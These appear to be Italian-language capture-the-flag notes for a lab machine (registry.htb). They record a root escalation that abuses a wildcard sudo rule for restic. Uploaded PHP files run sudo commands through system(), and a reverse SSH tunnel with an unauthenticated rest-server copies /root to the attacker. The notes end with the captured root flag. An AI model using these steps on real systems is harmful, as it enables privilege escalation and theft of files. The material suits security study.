sudo -l per www-data: può lanciare `/usr/bin/restic backup -r rest*` come root senza password; il wildcard dopo `rest` lascia a noi la scelta del repository (-r) e di tutto ciò che segue, incluse le directory da salvare. quando parte il backup il sito viene sovrascritto
534
535
536http://registry.htb/bolt/bolt/file/edit/config/config.yml
537http://registry.htb/bolt/bolt/files
538http://registry.htb/bolt/files/mytest.php?a846763cc3
539
540
541
542
543
544Matching Defaults entries for www-data on bolt:
545env_reset, exempt_group=sudo, mail_badpass,
546secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
547User www-data may run the following commands on bolt: (root) NOPASSWD: /usr/bin/restic backup -r rest*
548
549
<?php
// Same backup.php as above. The only thing sudo enforces is the argument
// prefix "rest*", so www-data may substitute any rest:http://... repository,
// any -p password file and any source path (e.g. /root) and restic still runs
// as root -- which is exactly the privilege-escalation path used below.
shell_exec("sudo restic backup -r rest:http://backup.registry.htb/bolt bolt");
551
552
shell_exec() restituisce lo stdout come stringa ma non lo stampa: senza echo la pagina resta vuota. usare echo system(...) come sotto, oppure redirigere l'output su file con >
554
555
556
557
558
<?php
// Sanity check that the sudo rule is reachable from the web tier: system()
// writes the command's stdout straight into the response, unlike shell_exec(),
// and "-r rest" satisfies the "rest*" glob, so restic's --help text showing up
// in the page proves the rule matched for www-data.
echo "Avvio shell...<br>";
echo system("sudo restic backup -r rest --help");
562
563
564Avvio shell...
565The "backup" command creates a new snapshot and saves the files and directories given as the arguments. Usage: restic backup [flags] FILE/DIR [FILE/DIR] ... Flags: -e, --exclude pattern exclude a pattern (can be specified multiple times) --exclude-caches excludes cache directories that are marked with a CACHEDIR.TAG file --exclude-file file read exclude patterns from a file (can be specified multiple times) --exclude-if-present stringArray takes filename[:header], exclude contents of directories containing filename (except filename itself) if header of that file is as provided (can be specified multiple times) --files-from string read the files to backup from file (can be combined with file args) -f, --force force re-reading the target files/directories (overrides the "parent" flag) -h, --help help for backup --hostname hostname set the hostname for the snapshot manually. To prevent an expensive rescan use the "parent" flag -x, --one-file-system exclude other file systems --parent string use this parent snapshot (default: last snapshot in the repo that has the same target files/directories) --stdin read backup from stdin --stdin-filename string file name to use when reading from stdin (default "stdin") --tag tag add a tag for the new snapshot (can be specified multiple times) --time string time of the backup (ex. '2012-11-01 22:08:41') (default: now) --with-atime store the atime for all files and directories Global Flags: --cacert stringSlice path to load root certificates from (default: use system certificates) --cache-dir string set the cache directory --cleanup-cache auto remove old cache directories --json set output mode to JSON for commands that support it --limit-download int limits downloads to a maximum rate in KiB/s. (default: unlimited) --limit-upload int limits uploads to a maximum rate in KiB/s. 
(default: unlimited) --no-cache do not use a local cache --no-lock do not lock the repo, this allows some operations on read-only repos -o, --option key=value set extended option (key=value, can be specified multiple times) -p, --password-file string read the repository password from a file (default: $RESTIC_PASSWORD_FILE) -q, --quiet do not output comprehensive progress report -r, --repo string repository to backup to or restore from (default: $RESTIC_REPOSITORY) --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key --tls-client-cert string path to a file containing PEM encoded TLS client certificate and private key
566
567:::::::::::::::::::::::::::::::::::::::::::::::::::::::
568
preparare (come utente bolt, sotto /tmp o altrove) un rest-server controllato da noi, raggiungibile dal target via tunnel ssh
https://github.com/restic/rest-server/blob/master/cmd/rest-server/main.go ?????
la regola sudo chiede solo che l'argomento di -r inizi con `rest`: qualsiasi rest:http://... va bene, non serve impersonare backup.registry.htb
572
573
574oppure
575
576https://computingforgeeks.com/best-secure-backup-program/
577
578
579$ sudo restic autocomplete
580
581Usage:
582 restic autocomplete [flags]
583
584Flags:
585 --completionfile string autocompletion file (default "/etc/bash_completion.d/restic.sh")
586
587
588
589
apri un tunnel SSH inverso (-R): la porta 6969 sul target viene inoltrata alla 8000 locale, dove gira il rest-server; poi scriviamo sul target il file con la password del repository per restic
591
# Reverse tunnel: port 6969 on the target is forwarded back to the rest-server
# on the attacker's 127.0.0.1:8000, so "rest:http://127.0.0.1:6969" on the box
# lands on a repository we control.
ssh -R 6969:127.0.0.1:8000 -i /root/Desktop/id_rsa bolt@registry.htb
# Run on the target after login. Repository password handed to restic via -p;
# any value works as long as you can supply it again when restoring. /tmp is
# world-readable, so never reuse a real secret here.
echo tecnica > /tmp/pwd.txt
594
595
596installazione di rest-server
597git clone https://github.com/restic/rest-server.git
598
599From source
600Build
601
602make
603
604
605
606If all goes well, you'll find the binary in the current directory.
607
608Alternatively, you can compile and install it in your $GOBIN with a standard go install ./cmd/rest-server. But, beware, you won't have version info built into binary when compiled that way!
609Install
610
611make install
612
613Installs the binary as /usr/local/bin/rest-server.
614
615Alternatively, you can install it manually anywhere you want. It's a single binary, there are no dependencies.
616
617##################à
618
619installa go per la compilazione del make
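# Go toolchain needed by "make" in the rest-server checkout. On Debian/Ubuntu the
# package is golang-go (or the golang metapackage); there is no package called
# "go", so the original line fails with "Unable to locate package go".
apt-get install -y golang-go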
621
622
623fai partire il server restic
# Attacker side: serve the restic repository over HTTP. --no-auth disables
# authentication on the endpoint; tolerable only because the service is reached
# solely through the ssh -R tunnel. No --listen is given, so it stays on the
# port the tunnel forwards to (8000).
rest-server --path /root/Desktop/restic/bolt/ --no-auth
625
626carichiamo il php in bolt
// Upload as .php into the Bolt files area once accept_file_types permits it and
// request it: www-data runs this, sudo's "rest*" glob still matches because the
// repository argument begins with "rest", and the source path is now /root
// instead of the site. restic, running as root, ships root's home through the
// tunnel to the attacker's rest-server (the root flag is read from the restored
// copy below).
echo system("sudo restic backup -r rest:http://127.0.0.1:6969 -p /tmp/pwd.txt /root");
628
629lanciamo il php e otteniamo il nome della snapshot creata
630scan [/root] [0:00] 10 directories, 14 files, 28.066 KiB scanned 10 directories, 14 files in 0:00 [0:00] 100.00% 28.066 KiB / 28.066 KiB 24 / 24 items 0 errors ETA 0:00 duration: 0:00 snapshot 4d72521f saved snapshot 4d72521f saved
631
632ripristiniamo il backup sul desktop
# Back on the attacker box: restore snapshot 4d72521f (the id printed by the
# backup run) from the repository rest-server wrote under --path. restic expects
# the repository password -- the value that went into /tmp/pwd.txt -- unless it
# is supplied via -p / RESTIC_PASSWORD_FILE. --target keeps the box's /root tree
# out of our own /root.
restic -r /root/Desktop/restic/bolt/ restore 4d72521f --target /root/Desktop/
634
635FLAG ROOT
636ntrkzgnkotaxyju0ntrinda4yzbkztgw